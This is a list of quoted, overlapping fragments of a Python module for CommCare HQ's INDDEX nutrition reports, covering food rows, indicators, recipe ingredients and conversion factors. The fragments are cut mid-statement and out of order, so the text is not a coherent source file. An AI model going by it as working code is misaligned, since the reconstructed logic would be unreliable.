"row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing",
"gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug",
"uuid from collections import defaultdict from functools import reduce from memoized import memoized",
"bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code",
"_get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients =",
"not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will be \" \"calculated",
"If it's an indicator in the UCR that hasn't been explicitly set, return",
"this dataset, it glues together all the component pieces and presents the result",
"CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const",
"and linked to the recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard",
"scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If it's an indicator that",
"custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps,",
"= self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists =",
"recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients)",
"I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'),",
"defaultdict from functools import reduce from memoized import memoized from corehq.apps.es import users",
"recipe are entered as additional food cases and linked to the recipe by",
"I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE),",
"age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name),",
"0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later:",
"raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients",
"recall session, calculated nutritional information, and auditing columns reporting on what data is",
"_matches_in_memory_filters(self, row): # If a gap type is specified, show only rows with",
"nutritional information, and auditing columns reporting on what data is or isn't available.",
"from memoized import memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import",
"I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term',",
") @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or",
"the recipe case, but don't have a case of their own. Nonstandard recipes",
"= False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code",
"= 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description",
"IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'),",
"*tags): self.slug = slug tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture",
"rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe, or it",
"import reduce from memoized import memoized from corehq.apps.es import users as user_es from",
"base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists =",
"domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items() if",
"corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData",
"IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER),",
"self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor",
"if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type == STANDARD_RECIPE: row.ingredient_type =",
"'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor",
"filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter",
"ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code =",
"I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META),",
"\"recipes\" lookup table. This dataset has additional rows inserted for each ingredient. These",
"IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR),",
"an indicator in the UCR that hasn't been explicitly set, return that val",
"ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions)",
"recipe more than once, in which case subsequent references point to the recipe",
"and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in",
"not self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column)",
"if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this",
"= ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code",
"for each ingredient. These rows are associated with the recipe case, but don't",
"more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self,",
"grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [],",
"can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id',",
"= FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code =",
"user and beneficiary during a recall session. The ingredients of the recipe are",
"def __init__(self, slug, *tags): self.slug = slug tags = set(tags) self.in_ucr = IN_UCR",
"into the report for them. Components ---------- FoodData :: This is the interface",
"self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code =",
"[], }) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']:",
"== 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None):",
"to this dataset, it glues together all the component pieces and presents the",
"= IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can",
"self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used",
"FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in",
"fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in",
"'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if",
"= _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val in",
"if v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def",
"rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references']",
"IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR,",
"in which case subsequent references point to the recipe definition with already_reported_recipe_case_id and",
"each ingredient. These rows are associated with the recipe case, but don't have",
"FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later'",
"amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type",
"self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code)",
"'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags):",
"uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code",
"self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount)",
"= self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code'",
"i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code]",
"__init__(self, slug, *tags): self.slug = slug tags = set(tags) self.in_ucr = IN_UCR in",
"recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients again. We need to",
"I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc',",
"if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self,",
"food_types and row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups",
"EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter by owner if",
"self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description",
"\"foodrecall\" case. Every food they mention results in the creation of a \"food\"",
"amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking']) if all(val is not None for val in [amount, portions,",
"child of this foodrecall. This dataset has a row for every food, with",
"None else: # If it's an indicator in the UCR that hasn't been",
"for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking",
"self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists",
"row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values()",
"a \"foodrecall\" case. Every food they mention results in the creation of a",
"nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def",
"IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender', IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR,",
"corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils",
"insert them from the master recipe nsr_cols = {col: master_recipe[col] for col in",
"if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code",
"for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and",
"= total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these",
"self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients'] if not master_recipe:",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8',",
"type is specified, show only rows with gaps of that type gap_type =",
"food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups:",
"the previously reported ingredients into the report for them. Components ---------- FoodData ::",
"FoodRow :: Class responsible for row-wise calculations and indicator definitions. \"\"\" import operator",
"recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] =",
"part of a recipe, or it wasn't found\"\"\" for raw_row in rows: row",
"Class responsible for row-wise calculations and indicator definitions. \"\"\" import operator import uuid",
"= group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from",
"INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS",
"fixture or from the parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug)",
"if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: #",
"yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values, insert",
"users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners",
"slugs) def _matches_in_memory_filters(self, row): # If a gap type is specified, show only",
"corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM,",
"= _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for row in [recipe] + ingredients:",
"nsr references are missing some values, insert them from the master recipe nsr_cols",
"interface to this dataset, it glues together all the component pieces and presents",
"recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction)",
"self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type",
"self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if",
"I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE),",
"FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See file docstring for more.\"\"\"",
"row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe =",
"[amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] =",
"and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used",
"nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator",
"be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR,",
"are entered as additional food cases and linked to the recipe by `recipe_case_id`.",
"**{k: [v for v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if",
"IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'),",
"self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code",
"that hasn't been explicitly set, check if it can # be pulled from",
"from the parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta:",
"filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in",
"I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5',",
"for group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients']",
"case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe, master_recipe):",
"self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used = 'reference_food_code'",
"def _get_grouped_rows(self): \"\"\"Return raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda: {",
"_insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows = []",
"recipe nsr_cols = {col: master_recipe[col] for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions",
"calculations and indicator definitions. \"\"\" import operator import uuid from collections import defaultdict",
"# std recipe ingredients come from the DB, NOT ingredient cases ingredients =",
"self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code' self.conv_factor =",
"of these foods are recipes, and their ingredients appear as separate rows in",
"metadata about the recall session, calculated nutritional information, and auditing columns reporting on",
"tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags",
"for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code', 'food_type']",
"INDDEX reports Overview -------- Beneficiaries are asked about their diet in a \"recall\"",
"= self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition()",
"for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name'] for",
"+ FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug in filter_selections: if",
"if recipe.food_type == STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type =",
"from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES,",
"all(val is not None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount",
"report eating a nonstandard recipe more than once, in which case subsequent references",
"IN_UCR), I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR,",
"for the INDDEX reports Overview -------- Beneficiaries are asked about their diet in",
"IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META),",
"pulled from the food fixture or from the parent food case's UCR if",
"wasn't found\"\"\" for raw_row in rows: row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount,",
"I('tag_6', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_6', IN_UCR), I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE),",
"missing some values, insert them from the master recipe nsr_cols = {col: master_recipe[col]",
"self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER",
"Get the food composition corresponding to food_code, fall back to base_term_food_code fct =",
"and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE",
"def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE",
"the primary dataset for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS =",
"def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return",
"name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name}",
"'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE for i",
"are asked about their diet in a \"recall\" session. This results in a",
"Some of these foods are recipes, and their ingredients appear as separate rows",
"the master dataset for the INDDEX reports Overview -------- Beneficiaries are asked about",
"IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags",
"row for every food, with metadata about the recall session, calculated nutritional information,",
"IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE),",
"if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code']",
"fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition",
"portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients):",
"for every food, with metadata about the recall session, calculated nutritional information, and",
"recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from the DB, NOT ingredient",
"else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe)",
"row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code",
"an indicator that hasn't been explicitly set, check if it can # be",
"row = FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True",
"if food_types and row.food_type not in food_types: return False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if",
"hasn't been explicitly set, check if it can # be pulled from the",
"None, 'references': [], 'ingredients': [], }) for row in self._ucr.get_data(): if row['food_type'] in",
"IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3',",
"in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} )",
"if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come from the DB, NOT",
"the recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients again. We need",
"self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code",
"with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and",
"# https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR,",
"and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code,",
"group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe,",
"I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR), I('tag_6',",
"in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter slug\") self.fixtures = FixtureAccessor(domain)",
"return [] # don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain)",
"return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe, or",
"not None for val in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions",
"need to insert duplicates of the previously reported ingredients into the report for",
"rows in the report. Standard recipes have their ingredients enumerated in the \"recipes\"",
"Every food they mention results in the creation of a \"food\" case that's",
"if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type ==",
"raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates the primary dataset",
"request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter by",
"if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types = self._in_memory_filter_selections.get('food_type')",
"std recipe ingredients come from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe,",
"self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions",
"None if self._is_std_recipe_ingredient: # If it's an indicator that hasn't been explicitly set,",
"age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name):",
"\" \"calculated outside the scope of FoodRow.\") return None if self._is_std_recipe_ingredient: # If",
"{} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients:",
"recall session. The ingredients of the recipe are entered as additional food cases",
"references = group['references'] ingredients = group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references +",
"return None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound:",
"corresponding to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code",
"None def _maybe_float(val): return float(val) if val not in (None, '') else None",
"If a gap type is specified, show only rows with gaps of that",
"If it's an indicator that hasn't been explicitly set, check if it can",
